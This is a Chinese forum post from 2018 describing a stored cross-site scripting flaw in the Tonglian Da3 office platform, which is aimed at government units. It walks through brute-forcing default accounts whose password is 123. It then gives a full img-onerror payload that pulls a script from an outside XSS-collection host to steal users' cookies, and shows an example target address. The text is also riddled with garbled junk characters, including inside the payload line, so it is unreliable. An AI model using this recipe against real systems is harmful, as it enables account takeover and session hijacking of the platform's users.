0 P, A& I( ?- ~1 _3 x; M2 X
( h: K5 A/ y$ ^" D& ^" I 同联Da3协同办公平台后台通用储存型xss漏洞
) t# j1 R, G, z
: N; V. Y. b' r# \( p
# ]) |/ M6 y: A, I0 x 平台简介:
/ i9 h5 c6 \( m6 \% P9 Y
# A% e V: T& B- o5 d$ {3 H- {0 M
4 ?# M' o3 H3 k. j) ~/ x
$ L1 q% e6 S) Z5 Z/ y) e
3 _9 L* E% R+ w g% l
& O% I' H, a! t 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
- Q9 C$ F% w) h9 d6 f
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ A5 I9 Q4 b' P! B: t
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
1 [ g# d; r/ K& D
6 c% ~# z2 l# a* q6 a: |3 M
* T$ X( i8 r8 F& e" r 4 @: W# W# L/ P& V4 }+ e
/ m" _' p5 g. l2 ^% E; n: e0 a8 e
# Q# L- Q0 C; z+ f+ m 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:% \' A3 f& j! N9 B/ s3 d
# I7 Q* ] H0 p$ L " @2 v% c8 y: j$ Z! i5 {; t8 S/ b; V
7 S- L" w& Z& m8 C3 B! C+ R& D
# X! T% p r5 E D
, ^' V1 V, K5 @9 f2 s http://1.1.1.1:7197/cap-aco/#(案例2-)) O" E, j& g% B; v. u/ \
# v% U2 m7 ]- p" S2 Y
3 t" B7 b9 \' Y7 {
http://www.XXOO.com (案例1-官网网站)- X S, S0 T+ z3 I+ o3 L
+ ^* F( ]% t: ~" k/ m/ f- i
0 d0 R0 a4 n! K) F: p/ M3 f
漏洞详情:0 n y) X0 Q7 i" t
) N0 U: j( Q2 n W8 |
0 C! a: m% q5 [9 t1 C
案例一、
. i2 I! }( \7 S* w
7 v( }- r% r& z& f# i8 \% b" ] . P* ?& c5 Q7 e6 m
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
|& i+ t- k. [- m! T5 p
' W5 G. b4 E: r% B$ r# ~6 { ) \9 M: n) f/ x c/ U: [
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:9 { F; x; Z% @5 Q; O0 j- I
$ K |( M, u& J+ C& i' ?. C
+ V- i) O7 I& I- s. j, ~# O
0 G/ i1 C; f9 X6 v: Z, Y+ w: x
6 |' @) w; a3 K( N 9 W: J7 f3 b- f
( f" r5 C* x6 D9 Z
1 b7 U7 t$ q5 A) [ " J/ d/ c# ?9 C: M4 |: I
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 9 [) U ]3 E( w& A. p; Q" e" S: O
+ z2 {# |7 C _) w+ [9 G/ k
+ u* I) m9 F9 y1 r! A- s% m
7 z. a# @0 H$ m* y0 E
9 E9 T, C# [1 v/ p4 q$ D. [
: K/ @: t' E; [2 L+ U& L 
. |$ R' B# I2 K5 y
3 S6 J; o: Z" f, W1 i7 {6 A& L
$ K7 B3 r x8 u! ?* M3 ` 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 ( V6 {% b; ]; P/ ^( l9 A! p
! Z1 g3 y1 f; y: H
. R9 V( t4 q( O; M 4 x" B. f0 d3 y) ^2 D8 ^; Z$ c! v
1 A* a( P$ O O6 q2 h' F
( v0 G* Z) \+ T0 l0 W/ o& B
<img src=x' @" k/ h6 n% w/ J. A% z0 [
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: & _7 m% K4 ^# }$ D* g5 f2 L
. p @% P2 G3 V
) \* D" t$ G7 N! y 
. \2 d1 _7 }! C _9 \7 d, z h2 k6 m
6 z2 p$ C* I1 U4 N2 D
/ Z% e% m& `% m8 M2 H( A+ Y 然后发送,接收cookie如图: , t' w k7 r( [/ t' E4 a
9 C/ K; W8 m0 q
1 f( B6 y& N+ O+ I+ G! j V6 {
; k2 u5 ~3 i# B
" M' Y- a9 {' B) V' c
5 A$ A, ]6 ]8 F' R- N) s* f5 n 4 L" U" z6 q8 S. p
3 @. @( w$ O4 n3 m/ D# Z - }9 M$ N# A0 m" ]# U* i! m! h# g
0 D6 X8 p3 b% |4 Z t0 B+ \
6 ]! u+ N9 ^" @- P
. ]) z' `5 Q" \
% P% K& D7 u7 X: L4 \9 z3 w- x& G
& C# I2 Q7 a, [ r
+ ]( b! I2 {8 K) _8 I8 C+ P8 R# ~ 
: ^ g! |* e3 M* i( s
4 r# v9 k2 Z3 M
( x" O1 l5 Z: U* m: s 
: H+ z' u8 ~2 e( m; ^
) q2 C6 z) U- K- y& l2 ^" d
6 }8 C) K- `. ^2 }* p( ?: A( z 3 |# N! w: O% }2 q$ t* y/ U4 M' V0 R
" c" a l2 a2 s) F$ ]4 J u# }' ]3 m- x' n2 }
案例2、
j1 J' X$ H6 f7 c* w" l
* z) X+ z+ E3 }) q' y4 d, H- I
; l! R; h" g2 h 前面步骤都一样,下面看效果图:
* ~( _0 q Y* m; _& ~2 E8 r
1 W( s) o# X8 C- X8 R ; i" M# h M0 B8 [ p4 \
( {$ y: }& u1 \& o7 c& u5 h( e* D; C) r
+ U9 D/ P6 Y3 B2 x& F4 E! M( O
. m0 S: r0 Q1 Q1 g* W; A 
# Q3 ]7 s. J9 i
( k# l5 R Y( Y( X9 T9 Z G1 `
8 ^4 {1 T( [5 r. D3 Y/ a+ H
) x: c5 P/ U7 D" ]
% i7 t3 U* b" L. E; y4 m
" P3 M, ~1 k: j6 k; c8 e/ u- p ' l3 h9 Q8 E4 [( `7 f( s
0 N$ x* v( p# ~ c# D5 y9 \ $ q/ G0 z! J7 X; O8 e
; J5 ~( ]. @6 ^ `& y- A3 |
+ Y) Q) T4 ` Y. B7 |, k3 n
/ T6 ~% {* n" Z( `( q7 P
' B+ D& m" u% R7 R* T# t: M
4 _/ K' K m. C6 H+ b2 U
: v$ J8 I6 m# D; x) P# K. {
. A8 T. a: s4 H
8 z% V$ `; a" I
' f# v9 X: U6 h' o3 m. `
- r" J7 M8 v1 g3 q7 u6 I0 @# q
* O* y5 |( Z. V% s. _! q
- J; t- p3 o9 m/ T
5 a: b! B8 G- Z' o
5 \7 v, B3 [. F$ M, L* r$ d
发表于 2018-10-20 20:14:15
收藏
支持
反对